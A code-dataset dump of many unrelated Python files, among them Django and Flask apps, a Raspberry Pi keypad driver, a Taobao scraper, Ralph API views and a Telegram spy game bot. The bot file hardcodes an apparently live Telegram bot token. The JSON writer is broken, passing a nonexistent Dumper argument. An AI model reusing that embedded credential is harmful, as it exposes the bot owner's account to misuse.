requests.get(url, headers=headers)\n dic = json.loads(response.text)\n # print(dic)\n return [dic['data']['tip_list'][0]['tip']['lnglat'], dic['data']['tip_list'][0]['tip']['id'],\n dic['data']['tip_list'][0]['tip']['category'], dic['data']['tip_list'][0]['tip']['name']]\n\n\ndef calculate_distance(cinema_pk, ori=\"浙江理工大学\", dis=\"杭州电子科技大学\"):\n \"\"\"\n\n :param cinema_pk: 电影院的pk\n :param ori: 起点\n :param dis: 终点\n :return:\n \"\"\"\n global result\n try:\n start_location = get_location(ori)\n end_location = get_location(dis)\n distance = float(getDistance(start_location, end_location))\n print(ori, dis, start_location, end_location, distance)\n if distance < dis_threshold:\n result.append([cinema_pk, distance]) # 保存小于距离阈值的电影院pk和距离\n except Exception as e:\n print(ori, dis, e)\n\n\ndef get_all_cinemas(city=\"杭州\", district=\"江干\", location=\"浙江财经大学\"):\n global result\n result = []\n query = CinemaUrl.objects.filter(city__contains=city).filter(district__contains=district) # 获取CinemaUrl对象\n ths = []\n for cinema in query:\n original_cinema_location = cinema.location\n\n new_cinema_location = clean_location(original_cinema_location)\n print(original_cinema_location, new_cinema_location)\n thread = 
Thread(target=calculate_distance, args=(cinema.pk, new_cinema_location, location, ))\n thread.start()\n ths.append(thread)\n for th in ths:\n th.join()\n\n print(result)\n return result\n\n # print(cinema_location)\n # calculate_distance(dis=cinema_location)\n\n\n# 对地址进行清洗\ndef clean_location(location):\n \"\"\"\n\n :param location:\n :return:\n \"\"\"\n indexes = [] # 分隔符的索引\n if \"路\" in location:\n indexes.append(location.index(\"路\"))\n\n if \"街\" in location:\n indexes.append(location.index(\"街\"))\n\n if \"广场\" in location:\n indexes.append(location.index(\"广场\")+1)\n\n if indexes:\n return location[:min(indexes)+1]\n else:\n return location\n\n # return location\n\n\nif __name__ == '__main__':\n get_all_cinemas()\n # calculate_distance()calculate_distance","sub_path":"movie/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299230218","text":"import json\n\n\"\"\"\nReader&Writer for json\n\"\"\"\n\n\nclass JsonRW:\n def __init__(self):\n print('Init')\n\n # read\n @staticmethod\n def read(file_path):\n _data = []\n with open(file_path, 'r') as f:\n _data = json.load(f)\n return _data\n\n # write\n @staticmethod\n def write(file_path, data):\n with open(file_path, \"w\", encoding=\"utf-8\") as f:\n json.dump(data, f, Dumper=json.RoundTripDumper)\n\n\n# main\nif __name__ == '__main__':\n _file_path = r'test/resources/files/data.json'\n result = JsonRW().read(file_path=_file_path)\n print(f'result:{result}')\n","sub_path":"file2file/json_rw.py","file_name":"json_rw.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95547280","text":"\nfrom app_main import app\nfrom tests import OhmTestCase\n\n\nclass DashboardTest(OhmTestCase):\n def test_dashboard(self):\n with app.test_client() as c:\n response = c.get('/dashboard')\n assert \"Ready to begin assessment\" in response.data\n\n def test_community_response(self):\n with app.test_client() as c:\n response = c.get('/community')\n assert \"Recent Signed Users\" in response.data","sub_path":"tests/pages_tests/dashboard_test.py","file_name":"dashboard_test.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372788666","text":"import RPi.GPIO as GPIO\nimport time\n\nclass Keypad():\n def __init__(self, debug = False):\n GPIO.setmode(GPIO.BCM)\n\n # Ascending order so R1 is pin 24, R2 is pin 25 etc.\n self._row_pins = [23, 24, 25, 12]\n self._column_pins = [16, 20, 21] \n\n # Simple dict for ease of access\n self._buttons_dict = {\t(23, 16) : 1, \t(23, 20) : 2, \t(23, 21) : 3,\n (24, 16) : 4, \t(24, 20) : 5, \t(24, 21) : 6,\n (25, 16) : 7, \t(25, 20) : 8, \t(25, 21) : 9,\n (12, 16) : '*', \t(12, 20) : 0, \t(12, 21) : '#'}\n\n self._last_pressed = None\n\n # Set up pins\n for rp in self.row_pins:\n GPIO.setup(rp, GPIO.OUT)\n for cp in self.column_pins:\n GPIO.setup(cp, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n\n if debug:\n print('Keypad setup succesfull')\n print('Keypad init completing with values:')\n print('Row pins: {:}\\nColumn_pins: {:}\\n'.format(self.row_pins, self.column_pins))\n\n\n # Accessor functions\n @property\n def row_pins(self):\n return self._row_pins\n @property\n def column_pins(self):\n return self._column_pins\n @property\n def buttons_dict(self):\n return self._buttons_dict\n @property\n def 
last_pressed(self):\n return self._last_pressed\n\n\n # Polls to check if key is being pressed once. Also waits and checks for debouncing.\n def poll(self, debug = False):\n for rp in self.row_pins:\n GPIO.output(rp, GPIO.HIGH)\n for cp in self.column_pins:\n # Doubly nested to check for noise\n if GPIO.input(cp) == GPIO.HIGH:\n time.sleep(.10)\n if GPIO.input(cp) == GPIO.HIGH:\n # Wait until button is released\n while GPIO.input(cp) == GPIO.HIGH:\n time.sleep(.05)\n button_pressed = self.buttons_dict[(rp, cp)]\n GPIO.output(rp, GPIO.LOW)\n if debug:\n print('Button: {:} was pushed. Pin {:}, {:}'.format(button_pressed, rp, cp))\n return button_pressed\n GPIO.output(rp, GPIO.LOW)\n return None\n\n\n# Initiate an object to use\nkeypad = Keypad(True)\n","sub_path":"keypad.py","file_name":"keypad.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"453023003","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\nimport os, re\n\npath = os.path.join(os.path.dirname(__file__), 'upyun', '__init__.py')\ninit_py = open(path).read()\nVERSION = re.match(\"__version__ = '([^']+)'\", init_py).group(1)\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n scripts= ['scripts/upyun-ft'],\n name = 'upyun-ft',\n version = VERSION,\n url = 'https://geakit.com/dingyan/upyun-ft',\n license = 'BSD',\n description = \"Upyun File Transfer based on Python API\",\n long_description=read('README.rst'),\n author = 'Michael Ding',\n author_email = 'dingyan@{nospam}freestorm.org',\n packages = ['upyun'],\n test_suite = 'tests',\n classifiers = [\n 'Environment :: Console',\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: System Administrators',\n 'License :: License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: System :: Systems Administration :: Authentication/Directory'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475841583","text":"import abc\nfrom typing import Optional\n\nimport lab as B\nimport numpy as np\nimport stheno\nimport torch\n\n__all__ = [\"GPGenerator\"]\n\n\nclass DataGenerator(metaclass=abc.ABCMeta):\n \"\"\"Data generator.\n\n Args:\n batch_size (int, optional): Batch size. Defaults to 16.\n num_tasks (int, optional): Number of tasks to generate per epoch. Must be an\n integer multiple of `batch_size`. Defaults to 2^14.\n x_range (tuple[float, float], optional): Range of the inputs. Defaults to\n [-2, 2].\n max_train_points (int, optional): Number of training points. Defaults to 50.\n num_test_points (int, optional): Number of testing points. 
Defaults to 50.\n \"\"\"\n\n def __init__(\n self,\n batch_size=16,\n num_tasks=2 ** 14,\n x_range=(-2, 2),\n max_train_points=50,\n num_test_points=50,\n ):\n self.batch_size = batch_size\n self.num_tasks = num_tasks\n self.num_batches = num_tasks // batch_size\n if self.num_batches * batch_size != num_tasks:\n raise ValueError(\n f\"Number of tasks {num_tasks} must be a multiple of \"\n f\"the batch size {batch_size}.\"\n )\n self.x_range = x_range\n self.max_train_points = max_train_points\n self.num_test_points = num_test_points\n\n @abc.abstractmethod\n def sample(self, x):\n \"\"\"Sample at inputs `x`.\n\n Args:\n x (vector): Inputs to sample at.\n\n Returns:\n vector: Sample at inputs `x`.\n \"\"\"\n\n def generate_batch(self, device: Optional[str] = None):\n \"\"\"Generate a batch.\n\n Args:\n device (str, optional): Name of device.\n\n Returns:\n dict: A task, which is a dictionary with keys `x`, `y`, `x_context`,\n `y_context`, `x_target`, and `y_target.\n \"\"\"\n task = {\n \"x\": [],\n \"y\": [],\n \"x_context\": [],\n \"y_context\": [],\n \"x_target\": [],\n \"y_target\": [],\n }\n\n # Determine number of test and train points.\n num_train_points = np.random.randint(3, self.max_train_points + 1)\n num_test_points = self.num_test_points\n num_points = num_train_points + num_test_points\n\n for i in range(self.batch_size):\n # Sample inputs and outputs.\n lower, upper = self.x_range\n x = lower + np.random.rand(num_points) * (upper - lower)\n y = self.sample(x)\n\n # Determine indices for train and test set.\n inds = np.random.permutation(x.shape[0])\n inds_train = sorted(inds[:num_train_points])\n inds_test = sorted(inds[num_train_points:num_points])\n\n # Record to task.\n task[\"x\"].append(np.sort(x))\n task[\"y\"].append(y[np.argsort(x)])\n task[\"x_context\"].append(x[inds_train])\n task[\"y_context\"].append(y[inds_train])\n task[\"x_target\"].append(x[inds_test])\n task[\"y_target\"].append(y[inds_test])\n\n # Stack batch and move to active device.\n task = {\n k: torch.tensor(\n B.uprank(B.stack(*v, axis=0), rank=3),\n dtype=torch.float32,\n device=device,\n )\n for k, v in task.items()\n }\n\n return task\n\n def epoch(self, device: Optional[str] = None):\n \"\"\"Construct a generator for an epoch.\n\n Args:\n device (str, optional): Name of device.\n\n Returns:\n generator: Generator for an epoch.\n \"\"\"\n return (self.generate_batch(device) for _ in range(self.num_batches))\n\n\nclass GPGenerator(DataGenerator):\n \"\"\"Generate samples from a GP with a given kernel.\n\n Further takes in keyword arguments for :class:`.data.DataGenerator`.\n\n Args:\n kernel (:class:`stheno.Kernel`, optional): Kernel to sample from.\n Defaults to an EQ kernel with length scale `0.25`.\n \"\"\"\n\n def __init__(self, kernel=stheno.EQ().stretch(0.25), **kw_args):\n self.kernel = kernel\n DataGenerator.__init__(self, **kw_args)\n\n def sample(self, x):\n gp = stheno.GP(self.kernel)\n return B.squeeze(gp(x).sample())\n","sub_path":"convcnp/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326777083","text":"from net.netarch import YoloArchitecture, YoloInferenceModel\n\n\nclass YOLO(object):\n\n def __init__(self):\n self.debug_timings = True\n self.yolo_arch = YoloArchitecture()\n self.model = self.yolo_arch.get_model()\n self.inf_model = YoloInferenceModel(self.model)\n\n def predict(self, frame):\n boxes_labels = self.inf_model.predict(frame)\n boxes = 
boxes_labels[0]\n labels = boxes_labels[1]\n\n return boxes, labels\n","sub_path":"src/yolo/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"116175596","text":"cities = [\"Shenzhen\", \"Guangzhou\", \"Shanghai\", \"Beijing\"]\nwith open(\"files/cities\", \"w\") as city_file:\n for city in cities:\n print(city, file=city_file)\n\n# cities =[]\n# with open(\"files/cities\",\"r\") as city_file:\n# for city in city_file:\n# cities.append(city.strip('\\n'))\n# print(cities)\n\n# imelda = \"More Mayhem\", \"Imelda May\", \"2011\", (\n# (1, \"Pulling the Rug\"),\n# (2, \"Psycho\"),\n# (3, \"Mayhem\"),\n# (4, \"Kentish Town Waltz\"))\n#\n# with open(\"files/imelda3\", 'w') as imelda_file:\n# print(imelda, file=imelda_file)\n\n# with open(\"files/imelda3\", \"r\") as imelda_file:\n# contents = imelda_file.readline()\n# imelda = eval(contents)\n# print(imelda)\n# title, artist, year, tracks = imelda\n# print(title)\n# print(artist)\n# print(year)\n# print(tracks)\n","sub_path":"IO/writeFile.py","file_name":"writeFile.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"115269940","text":"import re\r\nimport requests\r\n\r\nurl = 'https://s.m.taobao.com/search'\r\npayload = {'q': '锁骨链','s': '1','ie':'utf8'} #字典传递url参数 \r\nfile = open('taobao_test.txt','w',encoding='utf-8')\r\n\r\nfor k in range(0,10): #100次,就是100个页的商品数据\r\n\r\n #payload ['s'] = 44*k+1 #此处改变的url参数为s,s为1时第一页,s为45是第二页,89时第三页以此类推\r\n payload ['s'] = 5*k+1 #m.taobao手机端\r\n resp = requests.get(url, params = payload)\r\n print(resp.url) #打印访问的网址\r\n resp.encoding = 'utf-8' #设置编码\r\n #title = re.findall(r'\"raw_title\":\"([^\"]+)\"',resp.text,re.I) #PC端,正则保存所有raw_title的内容,这个是书名,下面是价格,地址\r\n #price = re.findall(r'\"view_price\":\"([^\"]+)\"',resp.text,re.I) \r\n #loc = re.findall(r'\"item_loc\":\"([^\"]+)\"',resp.text,re.I)\r\n #pay = re.findall(r'\"view_sales\":\"([^\"]+)\"',resp.text,re.I)\r\n #shop = re.findall(r'\"nick\":\"([^\"]+)\"',resp.text,re.I)\r\n mtitle = re.findall(r'\"title\":\"([^\"]+)\"',resp.text,re.I)#标签,下面都是手机端\r\n msold = re.findall(r'\"sold\":\"([^\"]+)\"',resp.text,re.I)#销量\r\n mcommentCount = re.findall(r'\"commentCount\":\"([^\"]+)\"',resp.text,re.I)#累积评价\r\n mnick = re.findall(r'\"nick\":\"([^\"]+)\"',resp.text,re.I)#店铺\r\n mprice = re.findall(r'\"price\":\"([^\"]+)\"',resp.text,re.I)#价钱\r\n mquantity = re.findall(r'\"quantity\":\"([^\"]+)\"',resp.text,re.I)#库存\r\n #x = len(title) #每一页商品的数量\r\n x = len(mtitle) #手机端\r\n for i in range(0,x) : #把列表的数据保存到文件中\r\n #file.write(str(k*44+i+1)+'标题:'+title[i]+'\\n'+'价格:'+price[i]+'\\n'+'地址:'+loc[i]+'\\n销量:'+pay[i]+'\\n店家:'+shop[i]+'\\n\\n')\r\n file.write(str(k*5+i+1)+'标题:'+mtitle[i]+'\\t'+'销量:'+msold[i]+'\\t'+'累计评价:'+mcommentCount[i]+'\\t'+'店铺:'+mnick[i]+'\\t'+'价钱:'+mprice[i]+'\\t'+'库存:'+mquantity[i]+'\\n')\r\n\r\n\r\nfile.close()","sub_path":"python/taobao_test.py","file_name":"taobao_test.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533588322","text":"import sqlite3\nimport subprocess\nfrom datetime import datetime, timedelta\nfrom pytz import timezone\nfrom make_log import log_exceptions, log_data\nfrom dateutil import parser as date_parser\n\n\ndef ifutc_to_indian(l_time):\n try:\n a = date_parser.parse(l_time)\n b = '%a %d %b %Y %H:%M:%S %z'\n with 
open('l_time.txt', 'a+') as temp:\n temp.write(l_time+'\\n')\n india = timezone('Asia/Kolkata')\n c = a.astimezone(india)\n sysnow = datetime.now(india)\n if c > sysnow:\n c = a.replace(tzinfo=india)\n temp_t = c.replace(tzinfo=None)\n l_time = c.strftime(b)\n if temp_t > datetime.now():\n log_data(msg='l_time greater than cur time.',l_time=l_time, now_time=str(datetime.now()))\n elif temp_t < datetime.now()-timedelta(seconds=900):\n log_data(msg='l_time less than (curtime-15min).', l_time=l_time, now_time=str(datetime.now()))\n return l_time\n except Exception as e:\n log_exceptions()\n print(e)\n return l_time\n\ndef time_fun_two(l_time):\n try:\n format = \"%d/%m/%Y %H:%M:%S\"\n a = datetime.strptime(l_time, format)\n sysnow = datetime.now()\n if a < sysnow - timedelta(seconds=500):\n a = sysnow\n l_time = a.strftime(format)\n return l_time\n except Exception as e:\n log_exceptions()\n print(e)\n return l_time\n\nif __name__ == \"__main__\":\n l_time = 'Wed, 17 Sep 2020 08:53:24 +0530'\n a = ifutc_to_indian(l_time)\n b = time_fun_two(\"22/09/2020 08:53:24\")\n pass","sub_path":"cust_time_functs.py","file_name":"cust_time_functs.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"117327397","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.core.urlresolvers import reverse\nfrom rest_framework import serializers, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom ralph.api import RalphReadOnlyAPIViewSet\nfrom ralph.api.fields import ModelMultipleChoiceField\nfrom ralph.lib.mixins.api import ChoiceFieldWithOtherOptionField\nfrom ralph.lib.mixins.forms import ChoiceFieldWithOtherOption\nfrom ralph.lib.transitions.api.serializers import (\n TransitionActionSerializer,\n TransitionJobSerializer,\n TransitionModelSerializer,\n TransitionSerializer\n)\nfrom ralph.lib.transitions.models import (\n Action,\n run_transition,\n Transition,\n TransitionJob,\n TransitionModel\n)\nfrom ralph.lib.transitions.views import collect_actions\n\nFIELD_MAP = {\n forms.CharField: (serializers.CharField, [\n 'max_length', 'initial', 'required'\n ]),\n forms.BooleanField: (serializers.BooleanField, ['initial', 'required']),\n forms.URLField: (serializers.URLField, ['initial', 'required']),\n forms.IntegerField: (serializers.IntegerField, ['initial', 'required']),\n forms.DecimalField: (serializers.DecimalField, ['initial', 'required']),\n forms.DateField: (serializers.DateField, ['initial', 'required']),\n forms.DateTimeField: (serializers.DateTimeField, ['initial', 'required']),\n forms.TimeField: (serializers.TimeField, ['initial', 'required']),\n forms.ModelMultipleChoiceField: (ModelMultipleChoiceField, [\n 'initial', 'required', 'choices'\n ]),\n forms.ModelChoiceField: (serializers.ChoiceField, [\n 'initial', 'required', 'choices'\n ]),\n forms.ChoiceField: (serializers.ChoiceField, [\n 'initial', 'required', 'choices'\n ]),\n ChoiceFieldWithOtherOption: (ChoiceFieldWithOtherOptionField, [\n 'initial', 'required', 'choices', 'auto_other_choice',\n 'other_option_label'\n ])\n}\n\n\nclass TransitionJobViewSet(RalphReadOnlyAPIViewSet):\n queryset = TransitionJob.objects.all()\n serializer_class = TransitionJobSerializer\n\n\nclass TransitionModelViewSet(RalphReadOnlyAPIViewSet):\n queryset = TransitionModel.objects.all()\n serializer_class = TransitionModelSerializer\n\n\nclass TransitionActionViewSet(RalphReadOnlyAPIViewSet):\n queryset = 
Action.objects.all()\n serializer_class = TransitionActionSerializer\n\n\nclass TransitionViewSet(RalphReadOnlyAPIViewSet):\n queryset = Transition.objects.all()\n serializer_class = TransitionSerializer\n prefetch_related = ['actions']\n\n\nclass TransitionView(APIView):\n\n def dispatch(self, request, transition_pk, obj_pk, *args, **kwargs):\n self.transition = Transition.objects.get(\n pk=transition_pk\n )\n self.obj = self.transition.model.content_type.get_object_for_this_type(\n pk=obj_pk\n )\n self.objects = [self.obj]\n self.actions, self.return_attachment = collect_actions(\n self.obj, self.transition\n )\n return super().dispatch(request, *args, **kwargs)\n\n def get_fields(self):\n fields = {}\n fields_name_map = {}\n for action in self.actions:\n action_fields = getattr(action, 'form_fields', {})\n for name, options in action_fields.items():\n # TODO: unify this with\n # TransitionViewMixin.form_fields_from_actions\n condition = options.get('condition', lambda x, y: True)\n if not condition(self.obj, self.actions):\n continue\n field_class, field_attr = FIELD_MAP.get(\n options['field'].__class__, None\n )\n attrs = {\n name: getattr(\n options['field'], name, None\n ) for name in field_attr\n }\n choices = options.get('choices')\n if choices:\n if callable(choices):\n list_of_choices = choices(self.actions, self.objects)\n else:\n list_of_choices = choices.copy()\n attrs['choices'] = list_of_choices\n fields_name_map[name] = '{}__{}'.format(action.__name__, name)\n fields[name] = field_class(**attrs)\n return fields, fields_name_map\n\n def get_serializer_class(self):\n class_name = 'TransitionSerializer{}'.format(\n self.obj.__class__.__name__\n )\n class_attrs, _ = self.get_fields()\n serializer_class = type(\n class_name, (serializers.Serializer,), class_attrs\n )\n\n return serializer_class\n\n def get_serializer(self, only_class=False):\n return self.get_serializer_class()()\n\n def add_function_name_to_data(self, data):\n result = {}\n _, fields_name_map = self.get_fields()\n for k, v in data.items():\n result[fields_name_map.get(k)] = v\n return result\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer_class()(data=request.data)\n serializer.is_valid(raise_exception=True)\n result = {}\n data = self.add_function_name_to_data(serializer.validated_data)\n transition_result = run_transition(\n self.objects,\n self.transition,\n self.transition.model.field_name,\n data,\n request=request\n )\n status_code = status.HTTP_201_CREATED\n if self.transition.is_async:\n result['job_ids'] = [\n reverse('transitionjob-detail', args=(i,))\n for i in transition_result\n ]\n status_code = status.HTTP_202_ACCEPTED\n return Response(result, status=status_code)\n","sub_path":"src/ralph/lib/transitions/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274242715","text":"import logging\nimport os\n\nfrom preprocess.parsers import pdb_parser\n\n\nclass Loader:\n def __init__(self, filepath):\n assert isinstance(filepath, str) and os.path.isfile(filepath)\n self.filepath = filepath\n\n def _load_file(self, filepath):\n with open(filepath) as file:\n lines = [line for line in file]\n return lines\n\n def _load_parser(self, parser_name):\n assert isinstance(parser_name, str)\n if hasattr(pdb_parser, parser_name):\n parser = getattr(pdb_parser, parser_name)\n assert issubclass(parser, pdb_parser.BaseParser), \\\n f\"{parser_name} is not 
a parser in module pdb_parser\"\n else:\n logging.error(f\"{parser_name} is not in module pdb_parser\")\n raise Exception\n return parser\n\n def parse_with(self, parsername):\n parser = self._load_parser(parsername)\n if parsername == 'HbondParser':\n loaded_parser = parser(self.filepath)\n else:\n filelines = self._load_file(self.filepath)\n loaded_parser = parser(filelines)\n parsed = loaded_parser.parsed\n return parsed\n","sub_path":"src/preprocess/parsers/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"134103367","text":"from django.db import models\n# Create your models here.\nclass Appointment(models.Model):\n your_name= models.CharField(max_length=40,verbose_name=\"Enter Your Full Name\")\n your_phone=models.CharField(max_length=17,verbose_name=\"Telephone Number ex: +90 111 222 33 44\")\n your_mail=models.EmailField(verbose_name=\"Enter Your Email\")\n your_address=models.CharField(max_length=40,verbose_name=\"Enter Your Address\")\n schedule_date = [\n ('Choose Your Scheldule', 'Choose Your Scheldule'),\n ('9 AM to 10 AM', '9 AM to 10 AM'),\n ('10 AM to 11 AM', '10 AM to 11 AM'),\n ('11 AM to 12 PM', '11 AM to 12 PM'),\n ('1 PM to 2 PM', '1 PM to 2 PM'),\n ('2 PM to 3 PM', '2 PM to 3 PM'),\n ('3 PM to 4 PM', '3 PM to 4 PM'),\n ('4 PM to 5 PM', '4 PM to 5 PM'),\n ]\n schedule_dates=models.CharField(\n max_length=40,\n choices=schedule_date,\n default='Choose Your Scheldule',\n )\n your_messagess=models.TextField(verbose_name=\"Enter Your Message\")\n Schedule_Days = [\n ('Choose Your Day', 'Choose Your Day'),\n ('Sunday', 'Sunday'),\n ('Monday', 'Monday'),\n ('Tuesday', 'Tuesday'),\n ('Wednesday', 'Wednesday'),\n ('Thursday', 'Thursday'),\n ('Friday', 'Friday'),\n ('Saturday', 'Saturday'), \n ]\n schedule_days = models.CharField(\n max_length=35,\n choices=Schedule_Days,\n default='Choose Your Scheldule Day',\n )\n time_stamp=models.DateTimeField(auto_now_add=True)\nclass Contact(models.Model):\n your_name = models.CharField(max_length=40,verbose_name=\"Enter Your Name\")\n your_mail = models.EmailField(verbose_name=\"Enter Your Mail\")\n your_messagess = models.TextField(verbose_name=\"Enter Your Message\")\n time_stamp=models.DateTimeField(auto_now_add=True)\n\n","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"240232944","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\nfrom flask import Flask\nfrom flask_bootstrap import Bootstrap\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\n\n\nlogin_manager = LoginManager()\nbootstrap = Bootstrap()\n#建立ORM\ndb = SQLAlchemy()\n\n#初始化login之前需要调用装饰器返回User表记录对象,用于登陆状态判断\ndef init_login(app):\n login_manager.init_app(app)\n login_manager.login_view = \"login\"\n @login_manager.user_loader\n def load_user(user_id):\n from models import User\n return db.session.query(User).get(user_id)\n\n#设置日志\nlogger = logging.getLogger('root')\nlogger.setLevel(logging.NOTSET)\nfmt = '%(levelname)s %(asctime)s - %(filename)s:%(funcName)s:[%(lineno)s] - %(message)s'\ndatefmt = '%Y-%m-%d %H:%M:%S'\n\n#输出到文件\nth = TimedRotatingFileHandler('app.log', when='D', interval=1, backupCount=1)\nth.setFormatter(logging.Formatter(fmt, datefmt))\n\n#输出到屏幕\nch = 
logging.StreamHandler()\nch.setFormatter(logging.Formatter(fmt, datefmt))\n\nlogger.addHandler(th)\nlogger.addHandler(ch)\n\ndef create_app():\n app = Flask(__name__,instance_relative_config=True)\n\n #加载普通配置\n app.config.from_object('config')\n #加载特殊配置,会在instance/目录下查找该文件\n app.config.from_pyfile('config.py')\n\n #加载蓝图\n from .api import api\n app.register_blueprint(api, url_prefix='/api/v1_0')\n\n #初始化bootstrap\n bootstrap.init_app(app)\n\n #初始化flask-login\n init_login(app)\n\n #初始化db\n db.init_app(app)\n\n from models import *\n\n return app\n\n\n","sub_path":"zgh/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487559966","text":"import random\nimport threading\n\nfrom telebot import TeleBot, types\n\nfrom config import creator\n\nbot = TeleBot('896522792:AAFj8eEFqAn68K3YZkJe9aDwQC9Xj3tEZ-c')\n\ngames = dict()\nroles = {'general': {'cabinet': 300,\n 'actions': ['hear', 'see', 'go_to_cabinet', 'nothing', 'arrest'],\n 'desc': '👨🏻‍✈️Ты генерал. Ты не можешь быть шпионом. Найди его! Твой кабинет: 300.',\n 'spy': '',\n 'no_spy': '',\n 'al': 3\n },\n\n 'secretar': {'cabinet': 200,\n 'actions': ['hear', 'see', 'steal_a_card', 'go_to_cabinet', 'nothing'],\n 'desc': '👨🏼‍💻Ты секретарь. Ты слышишь все, т.к сидишь на месте секретаря. Твой кабинет: 200.',\n 'spy': '\\n\\nТы шпион! Слушай все что происходит в здании и ищи коды, которые спрятал генерал!',\n 'no_spy': '\\n\\nТы не шпион, но если узнаешь кто это - донеси генералу!',\n 'al': 2\n },\n 'cleaner': {'cabinet': 100,\n 'actions': ['hear', 'see', 'steal_a_card', 'go_to_cabinet', 'nothing'],\n 'desc': '👩🏻🧹Ты просто уборщица. У тебя нет способностей.( Твой кабинет (если это можно назвать кабинетом): 100',\n 'spy': '\\n\\nТы шпион! Убирайся в здании и незаметно ищи коды, которые спрятал генерал!',\n 'no_spy': '\\n\\nТы не шпион, но если узнаешь кто это - донеси генералу! Хотя ты не любимчик генерала, вряд ли тебе кто поверит.',\n 'al': 1\n },\n\n }\nrusificate = {\n 'general': '👨🏻‍✈️Генерал',\n 'secretar': '👨🏼‍💻Секретарь',\n 'cleaner': '👩🏻🧹Уборщица',\n 'hear': 'Слушать',\n 'see': 'Подсматривать',\n 'steal_a_key': 'Украсть ключ',\n 'go_to_cabinet': 'Прогулятся',\n 'nothing': 'Отдыхать',\n 'arrest': 'Аррестовать',\n 'steal_a_card': 'Украсть AL'\n}\nemojize = {\n 'general': '👨🏻‍✈️',\n 'secretar': '👨🏼‍💻',\n 'cleaner': '👩🏻🧹'\n}\nrolelist = ['general', 'secretar', 'cleaner']\n\n\n@bot.message_handler(commands=['newgame'])\ndef game(m):\n if m.from_user.id != creator:\n return\n games[m.chat.id] = creategame()\n kb = types.InlineKeyboardMarkup()\n kb.add(types.InlineKeyboardButton('Присоеденится',\n url='t.me/' + bot.get_me().username + '?start={}'.format(m.chat.id)))\n bot.send_message(m.chat.id, 'Начался подбор в игру! для регистрации нажмите на кнопку ниже...', reply_markup=kb)\n\n\n@bot.message_handler(commands=['start'], func=lambda m: m.chat.type == 'private')\ndef start(m):\n game_id = int(m.text.split()[1])\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = True\n break\n if not game_exists:\n return\n if len(games[game_id]['players']) > 3:\n bot.send_message(m.chat.id, 'Вы не можете присоединится! 
Достигнуто маскимальное кол-во игроков.')\n return\n if m.from_user.id in games[game_id]['users']:\n bot.send_message(m.chat.id, 'Вы уже в игре!')\n return\n if games[game_id]['active']:\n bot.send_message(m.chat.id, 'Игра уже началась!')\n return\n temp_roles = games[game_id]['roles']\n try:\n temp_role = rolelist[len(temp_roles)]\n except:\n bot.send_message(m.chat.id, 'Вы не можете присоединится! Достигнуто маскимальное кол-во игроков.')\n return\n if temp_role != 'general' and games[game_id]['spy'] is None:\n spy = random.choice([True, False])\n games[game_id]['spy'] = m.from_user.id\n else:\n spy = False\n games[game_id]['players'].append(createuser(temp_role, m.from_user.id, m.from_user.first_name, spy))\n games[game_id]['roles'].append(temp_role)\n games[game_id]['users'].append(m.from_user.id)\n bot.send_message(m.chat.id, 'Вы присоеденились к игре.')\n bot.send_message(game_id, rusificate[temp_role] + ' ' + m.from_user.first_name + ' присоединился к игре!')\n\n\n@bot.message_handler(commands=['debug'])\ndef debuj(m):\n if m.from_user.id == creator:\n bot.send_message(m.chat.id, str(games).replace('{', '\\n{\\n').replace('}', '\\n}\\n'))\n\n\n@bot.message_handler(commands=['пудж'])\ndef addplayer(m):\n if m.from_user.id != creator:\n return\n try:\n chat = m.chat.id\n except:\n return\n if len(games[chat]['players']) > 3:\n bot.send_message(m.chat.id, 'Он не может присоединится! Достигнуто маскимальное кол-во игроков.')\n return\n if 